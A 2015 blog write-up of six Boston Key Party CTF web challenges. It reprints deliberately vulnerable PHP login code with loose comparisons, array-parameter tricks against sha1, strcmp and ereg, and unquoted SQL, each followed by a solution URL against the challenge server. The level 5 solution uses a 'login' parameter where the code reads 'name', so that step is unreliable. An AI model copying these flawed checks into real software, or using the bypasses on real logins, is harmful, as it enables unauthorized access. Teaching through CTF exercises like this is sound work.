01 March 2015

Boston Key Party CTF 2015: Web Challs Writeup


Quick Look on the web challs




LEVEL 1


1:  <html>  
2:  <head>  
3:       <title>level1</title>  
4:    <link rel='stylesheet' href='style.css' type='text/css'>  
5:  </head>  
6:  <body>  
7:  <?php  
8:  require 'flag.php';  
9:  if (isset($_GET['name']) and isset($_GET['password'])) {  
10:    if ($_GET['name'] == $_GET['password'])  
11:      print 'Your password can not be your name.';  
12:    else if (sha1($_GET['name']) === sha1($_GET['password']))  
13:     die('Flag: '.$flag);  
14:    else  
15:      print '<p class="alert">Invalid password.</p>';  
16:  }  
17:  ?>  
18:  <section class="login">  
19:       <div class="title">  
20:            <a href="./index.txt">Level 1</a>  
21:       </div>  
22:       <form method="get">  
23:            <input type="text" required name="name" placeholder="Name"/><br/>  
24:            <input type="text" required name="password" placeholder="Password" /><br/>  
25:            <input type="submit"/>  
26:       </form>  
27:  </section>  
28:  </body>  
29:  </html>  

http://52.10.107.64:8001/?name[]=s&password[]=ss

that will result null for both inputs so sha1(null) and you get flag



LEVEL 2


1:  <html>  
2:  <head>  
3:       <title>level2</title>  
4:    <link rel='stylesheet' href='style.css' type='text/css'>  
5:  </head>  
6:  <body>  
7:  <?php  
8:  require 'flag.php';  
9:  if (isset($_GET['password'])) {  
10:       if (is_numeric($_GET['password'])){  
11:            if (strlen($_GET['password']) < 4){  
12:                 if ($_GET['password'] > 999)  
13:                      die('Flag: '.$flag);  
14:                 else  
15:                      print '<p class="alert">Too little</p>';  
16:            } else  
17:                      print '<p class="alert">Too long</p>';  
18:       } else  
19:            print '<p class="alert">Password is not numeric</p>';  
20:  }  
21:  ?>  
22:  <section class="login">  
23:      <div class="title">  
24:          <a href="./index.txt">Level 2</a>  
25:      </div>  
26:      <form method="get">  
27:          <input type="text" required name="password" placeholder="Password" /><br/>  
28:          <input type="submit"/>  
29:      </form>  
30:  </section>  
31:  </body>  
32:  </html>  


we need an input that is less than 3 chars and get beyond is_numeric
we can get beyond is_numeric with hex input likt 0x1 but 0x0->0xf noone is > 999
so the solution is with e like 5e8
http://52.10.107.64:8002/?password=1e9


LEVEL 3


1:  <html>  
2:  <head>  
3:       <title>level3</title>  
4:    <link rel='stylesheet' href='style.css' type='text/css'>  
5:  </head>  
6:  <body>  
7:  <?php  
8:  require 'flag.php';  
9:  if (isset($_GET['password'])) {  
10:    if (strcmp($_GET['password'], $flag) == 0)  
11:            die('Flag: '.$flag);  
12:    else  
13:            print '<p class="alert">Invalid password.</p>';  
14:  }  
15:  ?>  
16:  <section class="login">  
17:      <div class="title">  
18:          <a href="./index.txt">Level 3</a>  
19:      </div>  
20:      <form method="get">  
21:          <input type="text" required name="password" placeholder="Password" /><br/>  
22:          <input type="submit"/>  
23:      </form>  
24:  </section>  
25:  </body>  
26:  </html>  

this one is just strcmp function fail
http://52.10.107.64:8003/?password[]=


LEVEL 4


1:  <html>  
2:  <head>  
3:       <title>level4</title>  
4:    <link rel='stylesheet' href='style.css' type='text/css'>  
5:  </head>  
6:  <body>  
7:  <?php  
8:  session_start();   
9:  require 'flag.php';  
10:  if (isset ($_GET['password'])) {  
11:    if ($_GET['password'] == $_SESSION['password'])  
12:      die ('Flag: '.$flag);  
13:    else  
14:      print '<p class="alert">Wrong guess.</p>';  
15:  }  
16:  // Unpredictable seed  
17:  mt_srand((microtime() ^ rand(1, 10000)) % rand(1, 10000) + rand(1, 10000));  
18:  ?>  
19:  <section class="login">  
20:      <div class="title">  
21:          <a href="./index.txt">Level 4</a>  
22:      </div>  
23:            <ul class="list">  
24:            <?php  
25:            for ($i=0; $i<3; $i++)  
26:                 print '<li>' . mt_rand (0, 0xffffff) . '</li>';  
27:            $_SESSION['password'] = mt_rand (0, 0xffffff);  
28:            ?>  
29:            </ul>  
30:      <form method="get">  
31:          <input type="text" required name="password" placeholder="Next number" /><br/>  
32:          <input type="submit"/>  
33:      </form>  
34:  </section>  
35:  </body>  
36:  </html>  

we don't really need to predict any seeds as it looks
it's comparing the entered password with the one in the session
so before you fill in the session call it

$ curl http://52.10.107.64:8004/?password= <html> <head> <title>level4</title> <link href="style.css" rel="stylesheet" type="text/css"></link> </head> <body> Flag: It_s33ms_that_PRNG_are_hard_too_after_all


LEVEL 5


1:  <html>  
2:  <head>  
3:       <title>level5</title>  
4:    <link rel='stylesheet' href='style.css' type='text/css'>  
5:  </head>  
6:  <body>  
7:  <?php  
8:  require 'flag.php';  
9:  if (isset ($_GET['name']) and isset ($_GET['password'])) {  
10:    $name = $_GET['name'];  
11:    $password = $_GET['password'];  
12:    if (ctype_alnum ($name) and ctype_alnum ($password)) {  
13:      $request = 'SELECT login FROM user where login = ' . $name . ' AND password = ' . $password . ';';  
14:      $db = new SQLite3 (sha1($flag).'.db', SQLITE3_OPEN_READONLY); // Ghetto anti-database-download  
15:      $result = $db->querySingle ($request);  
16:      $db->close ();  
17:      if ($result === FALSE)  
18:        echo '<p class="alert">"Invalid login or password</p>';  
19:      else  
20:        die('Flag: ' . $flag);  
21:    } else  
22:      echo '<p class="alert">Invalid chars detected</p>';  
23:  }  
24:  ?>  
25:  <section class="login">  
26:      <div class="title">  
27:          <a href="./index.txt">Level 5</a>  
28:      </div>  
29:      <form method="get">  
30:          <input type="text" required name="name" placeholder="Name"/><br/>  
31:          <input type="text" required name="password" placeholder="Password" /><br/>  
32:          <input type="submit"/>  
33:      </form>  
34:  </section>  
35:  </body>  
36:  </html>  



well, just send direct booleans for user and pwd and bingo !
http://52.10.107.64:8005/?login=1&password=1


LEVEL 6


1:  <html>  
2:  <head>  
3:       <title>level6</title>  
4:    <link rel='stylesheet' href='style.css' type='text/css'>  
5:  </head>  
6:  <body>  
7:  <?php  
8:  require 'flag.php';  
9:  if (isset ($_GET['password'])) {  
10:       if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)  
11:            echo '<p class="alert">You password must be alphanumeric</p>';  
12:       else if (strpos ($_GET['password'], '--') !== FALSE)  
13:            die('Flag: ' . $flag);  
14:       else  
15:            echo '<p class="alert">Invalid password</p>';  
16:  }  
17:  ?>  
18:  <section class="login">  
19:      <div class="title">  
20:          <a href="./index.txt">Level 6</a>  
21:      </div>  
22:      <form method="get">  
23:          <input type="text" required name="password" placeholder="Password" /><br/>  
24:          <input type="submit"/>  
25:      </form>  
26:  </section>  
27:  </body>  
28:  </html>  

http://52.10.107.64:8006/?password[]=



No comments:

Post a Comment